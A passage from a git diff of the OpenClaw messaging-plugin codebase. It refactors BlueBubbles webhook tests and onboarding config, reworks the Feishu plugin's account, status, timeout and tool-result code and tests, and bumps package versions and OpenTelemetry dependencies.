registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", + registerWebhookTarget({ + account: createMockAccount({ password: undefined }), }); const headerVariants: Record[] = [ @@ -732,26 +625,11 @@ describe("BlueBubbles webhook monitor", () => { { host: "localhost", forwarded: "for=203.0.113.10;proto=https;host=example.com" }, ]; for (const headers of headerVariants) { - const req = createMockRequest( - "POST", - "/bluebubbles-webhook", - { - type: "new-message", - data: { - text: "hello", - handle: { address: "+15551234567" }, - isGroup: false, - isFromMe: false, - guid: "msg-1", - }, - }, + const { handled, res } = await sendWebhookRequest({ + body: createWebhookPayload(), headers, - ); - (req as unknown as { socket: { remoteAddress: string } }).socket = { remoteAddress: "127.0.0.1", - }; - const res = createMockResponse(); - const handled = await handleBlueBubblesWebhookRequest(req, res); + }); expect(handled).toBe(true); expect(res.statusCode).toBe(401); } @@ -770,36 +648,18 @@ describe("BlueBubbles webhook monitor", () => { const { resolveChatGuidForTarget } = await import("./send.js"); vi.mocked(resolveChatGuidForTarget).mockClear(); - const account = createMockAccount({ groupPolicy: "open" }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", + registerWebhookTarget({ + account: createMockAccount({ groupPolicy: "open" }), }); - const payload = { - type: "new-message", - data: { + await sendWebhookRequest({ + body: createWebhookPayload({ text: "hello from group", - handle: { address: "+15551234567" }, isGroup: true, - isFromMe: false, - guid: "msg-1", chatId: "123", date: Date.now(), - }, - }; - - const req = createMockRequest("POST", "/bluebubbles-webhook", payload); - const res = createMockResponse(); - - await handleBlueBubblesWebhookRequest(req, res); + }), + }); await flushAsync(); expect(resolveChatGuidForTarget).toHaveBeenCalledWith( @@ -819,36 +679,18 @@ describe("BlueBubbles webhook monitor", () => { return EMPTY_DISPATCH_RESULT; }); - const account = createMockAccount({ groupPolicy: "open" }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", + registerWebhookTarget({ + account: createMockAccount({ groupPolicy: "open" }), }); - const payload = { - type: "new-message", - data: { + await sendWebhookRequest({ + body: createWebhookPayload({ text: "hello from group", - handle: { address: "+15551234567" }, isGroup: true, - isFromMe: false, - guid: "msg-1", chat: { chatGuid: "iMessage;+;chat123456" }, date: Date.now(), - }, - }; - - const req = createMockRequest("POST", "/bluebubbles-webhook", payload); - const res = createMockResponse(); - - await handleBlueBubblesWebhookRequest(req, res); + }), + }); await flushAsync(); expect(resolveChatGuidForTarget).not.toHaveBeenCalled(); diff --git a/extensions/bluebubbles/src/onboarding.ts b/extensions/bluebubbles/src/onboarding.ts index 8936d3d5c52..bd6bb0913b8 100644 --- a/extensions/bluebubbles/src/onboarding.ts +++ b/extensions/bluebubbles/src/onboarding.ts @@ -18,6 +18,7 @@ import { resolveBlueBubblesAccount, resolveDefaultBlueBubblesAccountId, } from "./accounts.js"; +import { applyBlueBubblesConnectionConfig } from "./config-apply.js"; import { hasConfiguredSecretInput, normalizeSecretInputString } from "./secret-input.js"; import { parseBlueBubblesAllowTarget } from "./targets.js"; import { normalizeBlueBubblesServerUrl } from "./types.js"; @@ -283,42 +284,16 @@ export const blueBubblesOnboardingAdapter: ChannelOnboardingAdapter = { } // Apply config - if (accountId === DEFAULT_ACCOUNT_ID) { - next = { - ...next, - channels: { - ...next.channels, - bluebubbles: { - ...next.channels?.bluebubbles, - enabled: true, - serverUrl, - password, - webhookPath, - }, - }, - }; - } else { - next = { - ...next, - channels: { - ...next.channels, - bluebubbles: { - ...next.channels?.bluebubbles, - enabled: true, - accounts: { - ...next.channels?.bluebubbles?.accounts, - [accountId]: { - ...next.channels?.bluebubbles?.accounts?.[accountId], - enabled: next.channels?.bluebubbles?.accounts?.[accountId]?.enabled ?? true, - serverUrl, - password, - webhookPath, - }, - }, - }, - }, - }; - } + next = applyBlueBubblesConnectionConfig({ + cfg: next, + accountId, + patch: { + serverUrl, + password, + webhookPath, + }, + accountEnabled: "preserve-or-true", + }); await prompter.note( [ diff --git a/extensions/bluebubbles/src/request-url.ts b/extensions/bluebubbles/src/request-url.ts index 0be775359d5..cd1527f186f 100644 --- a/extensions/bluebubbles/src/request-url.ts +++ b/extensions/bluebubbles/src/request-url.ts @@ -1,12 +1 @@ -export function resolveRequestUrl(input: RequestInfo | URL): string { - if (typeof input === "string") { - return input; - } - if (input instanceof URL) { - return input.toString(); - } - if (typeof input === "object" && input && "url" in input && typeof input.url === "string") { - return input.url; - } - return String(input); -} +export { resolveRequestUrl } from "openclaw/plugin-sdk/bluebubbles"; diff --git a/extensions/bluebubbles/src/send.ts b/extensions/bluebubbles/src/send.ts index a32fd92d470..8c12e88bd23 100644 --- a/extensions/bluebubbles/src/send.ts +++ b/extensions/bluebubbles/src/send.ts @@ -108,6 +108,19 @@ function resolvePrivateApiDecision(params: { }; } +async function parseBlueBubblesMessageResponse(res: Response): Promise { + const body = await res.text(); + if (!body) { + return { messageId: "ok" }; + } + try { + const parsed = JSON.parse(body) as unknown; + return { messageId: extractBlueBubblesMessageId(parsed) }; + } catch { + return { messageId: "ok" }; + } +} + type BlueBubblesChatRecord = Record; function extractChatGuid(chat: BlueBubblesChatRecord): string | null { @@ -342,16 +355,7 @@ async function createNewChatWithMessage(params: { } throw new Error(`BlueBubbles create chat failed (${res.status}): ${errorText || "unknown"}`); } - const body = await res.text(); - if (!body) { - return { messageId: "ok" }; - } - try { - const parsed = JSON.parse(body) as unknown; - return { messageId: extractBlueBubblesMessageId(parsed) }; - } catch { - return { messageId: "ok" }; - } + return parseBlueBubblesMessageResponse(res); } export async function sendMessageBlueBubbles( @@ -464,14 +468,5 @@ export async function sendMessageBlueBubbles( const errorText = await res.text(); throw new Error(`BlueBubbles send failed (${res.status}): ${errorText || "unknown"}`); } - const body = await res.text(); - if (!body) { - return { messageId: "ok" }; - } - try { - const parsed = JSON.parse(body) as unknown; - return { messageId: extractBlueBubblesMessageId(parsed) }; - } catch { - return { messageId: "ok" }; - } + return parseBlueBubblesMessageResponse(res); } diff --git a/extensions/copilot-proxy/package.json b/extensions/copilot-proxy/package.json index 58f5c6d39aa..ea24b22495c 100644 --- a/extensions/copilot-proxy/package.json +++ b/extensions/copilot-proxy/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/copilot-proxy", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw Copilot Proxy provider plugin", "type": "module", diff --git a/extensions/diagnostics-otel/package.json b/extensions/diagnostics-otel/package.json index 9b4f0523ede..c03df3af8e4 100644 --- a/extensions/diagnostics-otel/package.json +++ b/extensions/diagnostics-otel/package.json @@ -1,19 +1,19 @@ { "name": "@openclaw/diagnostics-otel", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw diagnostics OpenTelemetry exporter", "type": "module", "dependencies": { "@opentelemetry/api": "^1.9.0", - "@opentelemetry/api-logs": "^0.212.0", - "@opentelemetry/exporter-logs-otlp-proto": "^0.212.0", - "@opentelemetry/exporter-metrics-otlp-proto": "^0.212.0", - "@opentelemetry/exporter-trace-otlp-proto": "^0.212.0", - "@opentelemetry/resources": "^2.5.1", - "@opentelemetry/sdk-logs": "^0.212.0", - "@opentelemetry/sdk-metrics": "^2.5.1", - "@opentelemetry/sdk-node": "^0.212.0", - "@opentelemetry/sdk-trace-base": "^2.5.1", + "@opentelemetry/api-logs": "^0.213.0", + "@opentelemetry/exporter-logs-otlp-proto": "^0.213.0", + "@opentelemetry/exporter-metrics-otlp-proto": "^0.213.0", + "@opentelemetry/exporter-trace-otlp-proto": "^0.213.0", + "@opentelemetry/resources": "^2.6.0", + "@opentelemetry/sdk-logs": "^0.213.0", + "@opentelemetry/sdk-metrics": "^2.6.0", + "@opentelemetry/sdk-node": "^0.213.0", + "@opentelemetry/sdk-trace-base": "^2.6.0", "@opentelemetry/semantic-conventions": "^1.40.0" }, "openclaw": { diff --git a/extensions/diffs/package.json b/extensions/diffs/package.json index 7567e7a8ef0..f22da59a6c7 100644 --- a/extensions/diffs/package.json +++ b/extensions/diffs/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/diffs", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw diff viewer plugin", "type": "module", diff --git a/extensions/diffs/src/config.test.ts b/extensions/diffs/src/config.test.ts index a2795546fdb..b7845326483 100644 --- a/extensions/diffs/src/config.test.ts +++ b/extensions/diffs/src/config.test.ts @@ -7,6 +7,23 @@ import { resolveDiffsPluginSecurity, } from "./config.js"; +const FULL_DEFAULTS = { + fontFamily: "JetBrains Mono", + fontSize: 17, + lineSpacing: 1.8, + layout: "split", + showLineNumbers: false, + diffIndicators: "classic", + wordWrap: false, + background: false, + theme: "light", + fileFormat: "pdf", + fileQuality: "hq", + fileScale: 2.6, + fileMaxWidth: 1280, + mode: "file", +} as const; + describe("resolveDiffsPluginDefaults", () => { it("returns built-in defaults when config is missing", () => { expect(resolveDiffsPluginDefaults(undefined)).toEqual(DEFAULT_DIFFS_TOOL_DEFAULTS); @@ -15,39 +32,9 @@ describe("resolveDiffsPluginDefaults", () => { it("applies configured defaults from plugin config", () => { expect( resolveDiffsPluginDefaults({ - defaults: { - fontFamily: "JetBrains Mono", - fontSize: 17, - lineSpacing: 1.8, - layout: "split", - showLineNumbers: false, - diffIndicators: "classic", - wordWrap: false, - background: false, - theme: "light", - fileFormat: "pdf", - fileQuality: "hq", - fileScale: 2.6, - fileMaxWidth: 1280, - mode: "file", - }, + defaults: FULL_DEFAULTS, }), - ).toEqual({ - fontFamily: "JetBrains Mono", - fontSize: 17, - lineSpacing: 1.8, - layout: "split", - showLineNumbers: false, - diffIndicators: "classic", - wordWrap: false, - background: false, - theme: "light", - fileFormat: "pdf", - fileQuality: "hq", - fileScale: 2.6, - fileMaxWidth: 1280, - mode: "file", - }); + ).toEqual(FULL_DEFAULTS); }); it("clamps and falls back for invalid line spacing and indicators", () => { diff --git a/extensions/diffs/src/tool.test.ts b/extensions/diffs/src/tool.test.ts index ba72c011c76..97ee6234148 100644 --- a/extensions/diffs/src/tool.test.ts +++ b/extensions/diffs/src/tool.test.ts @@ -95,23 +95,11 @@ describe("diffs tool", () => { }); it("renders PDF output when fileFormat is pdf", async () => { - const screenshotter = { - screenshotHtml: vi.fn( - async ({ - outputPath, - image, - }: { - outputPath: string; - image: { format: string; qualityPreset: string; scale: number; maxWidth: number }; - }) => { - expect(image.format).toBe("pdf"); - expect(outputPath).toMatch(/preview\.pdf$/); - await fs.mkdir(path.dirname(outputPath), { recursive: true }); - await fs.writeFile(outputPath, Buffer.from("%PDF-1.7")); - return outputPath; - }, - ), - }; + const screenshotter = createPdfScreenshotter({ + assertOutputPath: (outputPath) => { + expect(outputPath).toMatch(/preview\.pdf$/); + }, + }); const tool = createDiffsTool({ api: createApi(), @@ -208,22 +196,7 @@ describe("diffs tool", () => { }); it("accepts deprecated format alias for fileFormat", async () => { - const screenshotter = { - screenshotHtml: vi.fn( - async ({ - outputPath, - image, - }: { - outputPath: string; - image: { format: string; qualityPreset: string; scale: number; maxWidth: number }; - }) => { - expect(image.format).toBe("pdf"); - await fs.mkdir(path.dirname(outputPath), { recursive: true }); - await fs.writeFile(outputPath, Buffer.from("%PDF-1.7")); - return outputPath; - }, - ), - }; + const screenshotter = createPdfScreenshotter(); const tool = createDiffsTool({ api: createApi(), @@ -492,6 +465,23 @@ function createPngScreenshotter( }; } +function createPdfScreenshotter( + params: { + assertOutputPath?: (outputPath: string) => void; + } = {}, +): DiffScreenshotter { + const screenshotHtml: DiffScreenshotter["screenshotHtml"] = vi.fn( + async ({ outputPath, image }: { outputPath: string; image: DiffRenderOptions["image"] }) => { + expect(image.format).toBe("pdf"); + params.assertOutputPath?.(outputPath); + await fs.mkdir(path.dirname(outputPath), { recursive: true }); + await fs.writeFile(outputPath, Buffer.from("%PDF-1.7")); + return outputPath; + }, + ); + return { screenshotHtml }; +} + function readTextContent(result: unknown, index: number): string { const content = (result as { content?: Array<{ type?: string; text?: string }> } | undefined) ?.content; diff --git a/extensions/discord/package.json b/extensions/discord/package.json index 2fe1336626d..1c3fe35f8eb 100644 --- a/extensions/discord/package.json +++ b/extensions/discord/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/discord", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Discord channel plugin", "type": "module", "openclaw": { diff --git a/extensions/feishu/package.json b/extensions/feishu/package.json index bb85da8ab41..716d597576e 100644 --- a/extensions/feishu/package.json +++ b/extensions/feishu/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/feishu", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Feishu/Lark channel plugin (community maintained by @m1heng)", "type": "module", "dependencies": { diff --git a/extensions/feishu/src/channel.ts b/extensions/feishu/src/channel.ts index 1e631c407e0..a8fa04d5700 100644 --- a/extensions/feishu/src/channel.ts +++ b/extensions/feishu/src/channel.ts @@ -1,6 +1,7 @@ import type { ChannelMeta, ChannelPlugin, ClawdbotConfig } from "openclaw/plugin-sdk/feishu"; import { - buildBaseChannelStatusSummary, + buildProbeChannelStatusSummary, + buildRuntimeAccountStatusSnapshot, createDefaultChannelRuntimeState, DEFAULT_ACCOUNT_ID, PAIRING_APPROVED_MESSAGE, @@ -54,6 +55,30 @@ const secretInputJsonSchema = { ], } as const; +function setFeishuNamedAccountEnabled( + cfg: ClawdbotConfig, + accountId: string, + enabled: boolean, +): ClawdbotConfig { + const feishuCfg = cfg.channels?.feishu as FeishuConfig | undefined; + return { + ...cfg, + channels: { + ...cfg.channels, + feishu: { + ...feishuCfg, + accounts: { + ...feishuCfg?.accounts, + [accountId]: { + ...feishuCfg?.accounts?.[accountId], + enabled, + }, + }, + }, + }, + }; +} + export const feishuPlugin: ChannelPlugin = { id: "feishu", meta: { @@ -178,23 +203,7 @@ export const feishuPlugin: ChannelPlugin = { } // For named accounts, set enabled in accounts[accountId] - const feishuCfg = cfg.channels?.feishu as FeishuConfig | undefined; - return { - ...cfg, - channels: { - ...cfg.channels, - feishu: { - ...feishuCfg, - accounts: { - ...feishuCfg?.accounts, - [accountId]: { - ...feishuCfg?.accounts?.[accountId], - enabled, - }, - }, - }, - }, - }; + return setFeishuNamedAccountEnabled(cfg, accountId, enabled); }, deleteAccount: ({ cfg, accountId }) => { const isDefault = accountId === DEFAULT_ACCOUNT_ID; @@ -281,23 +290,7 @@ export const feishuPlugin: ChannelPlugin = { }; } - const feishuCfg = cfg.channels?.feishu as FeishuConfig | undefined; - return { - ...cfg, - channels: { - ...cfg.channels, - feishu: { - ...feishuCfg, - accounts: { - ...feishuCfg?.accounts, - [accountId]: { - ...feishuCfg?.accounts?.[accountId], - enabled: true, - }, - }, - }, - }, - }; + return setFeishuNamedAccountEnabled(cfg, accountId, true); }, }, onboarding: feishuOnboardingAdapter, @@ -342,12 +335,10 @@ export const feishuPlugin: ChannelPlugin = { outbound: feishuOutbound, status: { defaultRuntime: createDefaultChannelRuntimeState(DEFAULT_ACCOUNT_ID, { port: null }), - buildChannelSummary: ({ snapshot }) => ({ - ...buildBaseChannelStatusSummary(snapshot), - port: snapshot.port ?? null, - probe: snapshot.probe, - lastProbeAt: snapshot.lastProbeAt ?? null, - }), + buildChannelSummary: ({ snapshot }) => + buildProbeChannelStatusSummary(snapshot, { + port: snapshot.port ?? null, + }), probeAccount: async ({ account }) => await probeFeishu(account), buildAccountSnapshot: ({ account, runtime, probe }) => ({ accountId: account.accountId, @@ -356,12 +347,8 @@ export const feishuPlugin: ChannelPlugin = { name: account.name, appId: account.appId, domain: account.domain, - running: runtime?.running ?? false, - lastStartAt: runtime?.lastStartAt ?? null, - lastStopAt: runtime?.lastStopAt ?? null, - lastError: runtime?.lastError ?? null, + ...buildRuntimeAccountStatusSnapshot({ runtime, probe }), port: runtime?.port ?? null, - probe, }), }, gateway: { diff --git a/extensions/feishu/src/client.test.ts b/extensions/feishu/src/client.test.ts index 00c4d0aafd8..a5855fa0745 100644 --- a/extensions/feishu/src/client.test.ts +++ b/extensions/feishu/src/client.test.ts @@ -192,7 +192,7 @@ describe("createFeishuClient HTTP timeout", () => { ); }); - it("uses env timeout override when provided", async () => { + it("uses env timeout override when provided and no direct timeout is set", async () => { process.env[FEISHU_HTTP_TIMEOUT_ENV_VAR] = "60000"; createFeishuClient({ @@ -214,6 +214,29 @@ describe("createFeishuClient HTTP timeout", () => { ); }); + it("prefers direct timeout over env override", async () => { + process.env[FEISHU_HTTP_TIMEOUT_ENV_VAR] = "60000"; + + createFeishuClient({ + appId: "app_10", + appSecret: "secret_10", + accountId: "timeout-direct-override", + httpTimeoutMs: 120_000, + config: { httpTimeoutMs: 45_000 }, + }); + + const calls = (LarkClient as unknown as ReturnType).mock.calls; + const lastCall = calls[calls.length - 1][0] as { + httpInstance: { get: (...args: unknown[]) => Promise }; + }; + await lastCall.httpInstance.get("https://example.com/api"); + + expect(mockBaseHttpInstance.get).toHaveBeenCalledWith( + "https://example.com/api", + expect.objectContaining({ timeout: 120_000 }), + ); + }); + it("clamps env timeout override to max bound", async () => { process.env[FEISHU_HTTP_TIMEOUT_ENV_VAR] = String(FEISHU_HTTP_TIMEOUT_MAX_MS + 123_456); diff --git a/extensions/feishu/src/client.ts b/extensions/feishu/src/client.ts index 26da3c9bfdd..d9fdde7f059 100644 --- a/extensions/feishu/src/client.ts +++ b/extensions/feishu/src/client.ts @@ -79,6 +79,15 @@ function resolveConfiguredHttpTimeoutMs(creds: FeishuClientCredentials): number return Math.min(Math.max(rounded, 1), FEISHU_HTTP_TIMEOUT_MAX_MS); }; + const fromDirectField = creds.httpTimeoutMs; + if ( + typeof fromDirectField === "number" && + Number.isFinite(fromDirectField) && + fromDirectField > 0 + ) { + return clampTimeout(fromDirectField); + } + const envRaw = process.env[FEISHU_HTTP_TIMEOUT_ENV_VAR]; if (envRaw) { const envValue = Number(envRaw); @@ -88,8 +97,7 @@ function resolveConfiguredHttpTimeoutMs(creds: FeishuClientCredentials): number } const fromConfig = creds.config?.httpTimeoutMs; - const fromDirectField = creds.httpTimeoutMs; - const timeout = fromDirectField ?? fromConfig; + const timeout = fromConfig; if (typeof timeout !== "number" || !Number.isFinite(timeout) || timeout <= 0) { return FEISHU_HTTP_TIMEOUT_MS; } diff --git a/extensions/feishu/src/drive.ts b/extensions/feishu/src/drive.ts index f9eacc9287d..227c30fbbb7 100644 --- a/extensions/feishu/src/drive.ts +++ b/extensions/feishu/src/drive.ts @@ -3,15 +3,11 @@ import type { OpenClawPluginApi } from "openclaw/plugin-sdk/feishu"; import { listEnabledFeishuAccounts } from "./accounts.js"; import { FeishuDriveSchema, type FeishuDriveParams } from "./drive-schema.js"; import { createFeishuToolClient, resolveAnyEnabledFeishuToolsConfig } from "./tool-account.js"; - -// ============ Helpers ============ - -function json(data: unknown) { - return { - content: [{ type: "text" as const, text: JSON.stringify(data, null, 2) }], - details: data, - }; -} +import { + jsonToolResult, + toolExecutionErrorResult, + unknownToolActionResult, +} from "./tool-result.js"; // ============ Actions ============ @@ -206,21 +202,21 @@ export function registerFeishuDriveTools(api: OpenClawPluginApi) { }); switch (p.action) { case "list": - return json(await listFolder(client, p.folder_token)); + return jsonToolResult(await listFolder(client, p.folder_token)); case "info": - return json(await getFileInfo(client, p.file_token)); + return jsonToolResult(await getFileInfo(client, p.file_token)); case "create_folder": - return json(await createFolder(client, p.name, p.folder_token)); + return jsonToolResult(await createFolder(client, p.name, p.folder_token)); case "move": - return json(await moveFile(client, p.file_token, p.type, p.folder_token)); + return jsonToolResult(await moveFile(client, p.file_token, p.type, p.folder_token)); case "delete": - return json(await deleteFile(client, p.file_token, p.type)); + return jsonToolResult(await deleteFile(client, p.file_token, p.type)); default: // eslint-disable-next-line @typescript-eslint/no-explicit-any -- exhaustive check fallback - return json({ error: `Unknown action: ${(p as any).action}` }); + return unknownToolActionResult((p as { action?: unknown }).action); } } catch (err) { - return json({ error: err instanceof Error ? err.message : String(err) }); + return toolExecutionErrorResult(err); } }, }; diff --git a/extensions/feishu/src/media.test.ts b/extensions/feishu/src/media.test.ts index 122b4477809..813e5090292 100644 --- a/extensions/feishu/src/media.test.ts +++ b/extensions/feishu/src/media.test.ts @@ -16,6 +16,8 @@ const messageCreateMock = vi.hoisted(() => vi.fn()); const messageResourceGetMock = vi.hoisted(() => vi.fn()); const messageReplyMock = vi.hoisted(() => vi.fn()); +const FEISHU_MEDIA_HTTP_TIMEOUT_MS = 120_000; + vi.mock("./client.js", () => ({ createFeishuClient: createFeishuClientMock, })); @@ -54,6 +56,14 @@ function expectPathIsolatedToTmpRoot(pathValue: string, key: string): void { expect(rel === ".." || rel.startsWith(`..${path.sep}`)).toBe(false); } +function expectMediaTimeoutClientConfigured(): void { + expect(createFeishuClientMock).toHaveBeenCalledWith( + expect.objectContaining({ + httpTimeoutMs: FEISHU_MEDIA_HTTP_TIMEOUT_MS, + }), + ); +} + describe("sendMediaFeishu msg_type routing", () => { beforeEach(() => { vi.clearAllMocks(); @@ -182,7 +192,7 @@ describe("sendMediaFeishu msg_type routing", () => { ); }); - it("uses image upload timeout override for image media", async () => { + it("configures the media client timeout for image uploads", async () => { await sendMediaFeishu({ cfg: {} as any, to: "user:ou_target", @@ -190,11 +200,7 @@ describe("sendMediaFeishu msg_type routing", () => { fileName: "photo.png", }); - expect(imageCreateMock).toHaveBeenCalledWith( - expect.objectContaining({ - timeout: 120_000, - }), - ); + expectMediaTimeoutClientConfigured(); expect(messageCreateMock).toHaveBeenCalledWith( expect.objectContaining({ data: expect.objectContaining({ msg_type: "image" }), @@ -320,9 +326,9 @@ describe("sendMediaFeishu msg_type routing", () => { expect(imageGetMock).toHaveBeenCalledWith( expect.objectContaining({ path: { image_key: imageKey }, - timeout: 120_000, }), ); + expectMediaTimeoutClientConfigured(); expect(result.buffer).toEqual(Buffer.from("image-data")); expect(capturedPath).toBeDefined(); expectPathIsolatedToTmpRoot(capturedPath as string, imageKey); @@ -512,9 +518,9 @@ describe("downloadMessageResourceFeishu", () => { expect.objectContaining({ path: { message_id: "om_audio_msg", file_key: "file_key_audio" }, params: { type: "file" }, - timeout: 120_000, }), ); + expectMediaTimeoutClientConfigured(); expect(result.buffer).toBeInstanceOf(Buffer); }); @@ -532,9 +538,9 @@ describe("downloadMessageResourceFeishu", () => { expect.objectContaining({ path: { message_id: "om_img_msg", file_key: "img_key_1" }, params: { type: "image" }, - timeout: 120_000, }), ); + expectMediaTimeoutClientConfigured(); expect(result.buffer).toBeInstanceOf(Buffer); }); }); diff --git a/extensions/feishu/src/media.ts b/extensions/feishu/src/media.ts index 6d9f821c602..4aba038b4a9 100644 --- a/extensions/feishu/src/media.ts +++ b/extensions/feishu/src/media.ts @@ -106,7 +106,6 @@ export async function downloadImageFeishu(params: { const response = await client.im.image.get({ path: { image_key: normalizedImageKey }, - timeout: FEISHU_MEDIA_HTTP_TIMEOUT_MS, }); const buffer = await readFeishuResponseBuffer({ @@ -146,7 +145,6 @@ export async function downloadMessageResourceFeishu(params: { const response = await client.im.messageResource.get({ path: { message_id: messageId, file_key: normalizedFileKey }, params: { type }, - timeout: FEISHU_MEDIA_HTTP_TIMEOUT_MS, }); const buffer = await readFeishuResponseBuffer({ @@ -202,7 +200,6 @@ export async function uploadImageFeishu(params: { // eslint-disable-next-line @typescript-eslint/no-explicit-any -- SDK accepts Buffer or ReadStream image: imageData as any, }, - timeout: FEISHU_MEDIA_HTTP_TIMEOUT_MS, }); // SDK v1.30+ returns data directly without code wrapper on success @@ -277,7 +274,6 @@ export async function uploadFileFeishu(params: { file: fileData as any, ...(duration !== undefined && { duration }), }, - timeout: FEISHU_MEDIA_HTTP_TIMEOUT_MS, }); // SDK v1.30+ returns data directly without code wrapper on success diff --git a/extensions/feishu/src/monitor.reaction.test.ts b/extensions/feishu/src/monitor.reaction.test.ts index f69ac647376..5537af6b214 100644 --- a/extensions/feishu/src/monitor.reaction.test.ts +++ b/extensions/feishu/src/monitor.reaction.test.ts @@ -51,6 +51,30 @@ function makeReactionEvent( }; } +function createFetchedReactionMessage(chatId: string) { + return { + messageId: "om_msg1", + chatId, + senderOpenId: "ou_bot", + content: "hello", + contentType: "text", + }; +} + +async function resolveReactionWithLookup(params: { + event?: FeishuReactionCreatedEvent; + lookupChatId: string; +}) { + return await resolveReactionSyntheticEvent({ + cfg, + accountId: "default", + event: params.event ?? makeReactionEvent(), + botOpenId: "ou_bot", + fetchMessage: async () => createFetchedReactionMessage(params.lookupChatId), + uuid: () => "fixed-uuid", + }); +} + type FeishuMention = NonNullable[number]; function buildDebounceConfig(): ClawdbotConfig { @@ -77,7 +101,7 @@ function buildDebounceAccount(): ResolvedFeishuAccount { enabled: true, configured: true, appId: "cli_test", - appSecret: "secret_test", + appSecret: "secret_test", // pragma: allowlist secret domain: "feishu", config: { enabled: true, @@ -152,6 +176,30 @@ function getFirstDispatchedEvent(): FeishuMessageEvent { return firstParams.event; } +function setDedupPassThroughMocks(): void { + vi.spyOn(dedup, "tryRecordMessage").mockReturnValue(true); + vi.spyOn(dedup, "tryRecordMessagePersistent").mockResolvedValue(true); + vi.spyOn(dedup, "hasRecordedMessage").mockReturnValue(false); + vi.spyOn(dedup, "hasRecordedMessagePersistent").mockResolvedValue(false); +} + +function createMention(params: { openId: string; name: string; key?: string }): FeishuMention { + return { + key: params.key ?? "@_user_1", + id: { open_id: params.openId }, + name: params.name, + }; +} + +async function enqueueDebouncedMessage( + onMessage: (data: unknown) => Promise, + event: FeishuMessageEvent, +): Promise { + await onMessage(event); + await Promise.resolve(); + await Promise.resolve(); +} + describe("resolveReactionSyntheticEvent", () => { it("filters app self-reactions", async () => { const event = makeReactionEvent({ operator_type: "app" }); @@ -272,23 +320,12 @@ describe("resolveReactionSyntheticEvent", () => { }); it("uses event chat context when provided", async () => { - const event = makeReactionEvent({ - chat_id: "oc_group_from_event", - chat_type: "group", - }); - const result = await resolveReactionSyntheticEvent({ - cfg, - accountId: "default", - event, - botOpenId: "ou_bot", - fetchMessage: async () => ({ - messageId: "om_msg1", - chatId: "oc_group_from_lookup", - senderOpenId: "ou_bot", - content: "hello", - contentType: "text", + const result = await resolveReactionWithLookup({ + event: makeReactionEvent({ + chat_id: "oc_group_from_event", + chat_type: "group", }), - uuid: () => "fixed-uuid", + lookupChatId: "oc_group_from_lookup", }); expect(result).toEqual({ @@ -309,20 +346,8 @@ describe("resolveReactionSyntheticEvent", () => { }); it("falls back to reacted message chat_id when event chat_id is absent", async () => { - const event = makeReactionEvent(); - const result = await resolveReactionSyntheticEvent({ - cfg, - accountId: "default", - event, - botOpenId: "ou_bot", - fetchMessage: async () => ({ - messageId: "om_msg1", - chatId: "oc_group_from_lookup", - senderOpenId: "ou_bot", - content: "hello", - contentType: "text", - }), - uuid: () => "fixed-uuid", + const result = await resolveReactionWithLookup({ + lookupChatId: "oc_group_from_lookup", }); expect(result?.message.chat_id).toBe("oc_group_from_lookup"); @@ -330,20 +355,8 @@ describe("resolveReactionSyntheticEvent", () => { }); it("falls back to sender p2p chat when lookup returns empty chat_id", async () => { - const event = makeReactionEvent(); - const result = await resolveReactionSyntheticEvent({ - cfg, - accountId: "default", - event, - botOpenId: "ou_bot", - fetchMessage: async () => ({ - messageId: "om_msg1", - chatId: "", - senderOpenId: "ou_bot", - content: "hello", - contentType: "text", - }), - uuid: () => "fixed-uuid", + const result = await resolveReactionWithLookup({ + lookupChatId: "", }); expect(result?.message.chat_id).toBe("p2p:ou_user1"); @@ -396,42 +409,25 @@ describe("Feishu inbound debounce regressions", () => { }); it("keeps bot mention when per-message mention keys collide across non-forward messages", async () => { - vi.spyOn(dedup, "tryRecordMessage").mockReturnValue(true); - vi.spyOn(dedup, "tryRecordMessagePersistent").mockResolvedValue(true); - vi.spyOn(dedup, "hasRecordedMessage").mockReturnValue(false); - vi.spyOn(dedup, "hasRecordedMessagePersistent").mockResolvedValue(false); + setDedupPassThroughMocks(); const onMessage = await setupDebounceMonitor(); - await onMessage( + await enqueueDebouncedMessage( + onMessage, createTextEvent({ messageId: "om_1", text: "first", - mentions: [ - { - key: "@_user_1", - id: { open_id: "ou_user_a" }, - name: "user-a", - }, - ], + mentions: [createMention({ openId: "ou_user_a", name: "user-a" })], }), ); - await Promise.resolve(); - await Promise.resolve(); - await onMessage( + await enqueueDebouncedMessage( + onMessage, createTextEvent({ messageId: "om_2", text: "@bot second", - mentions: [ - { - key: "@_user_1", - id: { open_id: "ou_bot" }, - name: "bot", - }, - ], + mentions: [createMention({ openId: "ou_bot", name: "bot" })], }), ); - await Promise.resolve(); - await Promise.resolve(); await vi.advanceTimersByTimeAsync(25); expect(handleFeishuMessageMock).toHaveBeenCalledTimes(1); @@ -473,42 +469,25 @@ describe("Feishu inbound debounce regressions", () => { }); it("does not synthesize mention-forward intent across separate messages", async () => { - vi.spyOn(dedup, "tryRecordMessage").mockReturnValue(true); - vi.spyOn(dedup, "tryRecordMessagePersistent").mockResolvedValue(true); - vi.spyOn(dedup, "hasRecordedMessage").mockReturnValue(false); - vi.spyOn(dedup, "hasRecordedMessagePersistent").mockResolvedValue(false); + setDedupPassThroughMocks(); const onMessage = await setupDebounceMonitor(); - await onMessage( + await enqueueDebouncedMessage( + onMessage, createTextEvent({ messageId: "om_user_mention", text: "@alice first", - mentions: [ - { - key: "@_user_1", - id: { open_id: "ou_alice" }, - name: "alice", - }, - ], + mentions: [createMention({ openId: "ou_alice", name: "alice" })], }), 